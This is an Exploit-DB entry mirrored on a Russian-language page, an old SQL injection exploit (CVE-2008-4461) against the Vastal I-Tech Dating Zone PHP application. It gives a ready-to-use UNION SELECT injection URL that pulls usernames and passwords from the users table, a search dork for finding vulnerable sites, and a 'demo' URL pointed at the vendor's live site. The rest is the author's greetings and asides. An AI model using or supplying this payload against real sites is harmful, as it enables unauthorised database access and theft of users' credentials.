- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6388
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4461
- Дата публикации
- 2008-09-06
Код:
########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability
author: ZoRLu
home: yildirimordulari.org - - - z0rlu.blogspot.com - - - r00tsecurity.org
contact: [email protected] & [email protected] ( baska msn yok taklitlerden kacInIn )
Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... : ( (
Not: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
dork: "advanced_search_results.php?gender="
########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
http://localhost/datingzone_path/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15
demo:
http://datingzone.vastal.com/advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15
########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
Efsane: YILDIRIMORDULARI.ORG
Yemisim Alaskasini : ) ) insan1n kendi memleketi gibisi yokk : ) )
########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ##############################
# milw0rm.com [2008-09-06]
- Источник
- www.exploit-db.com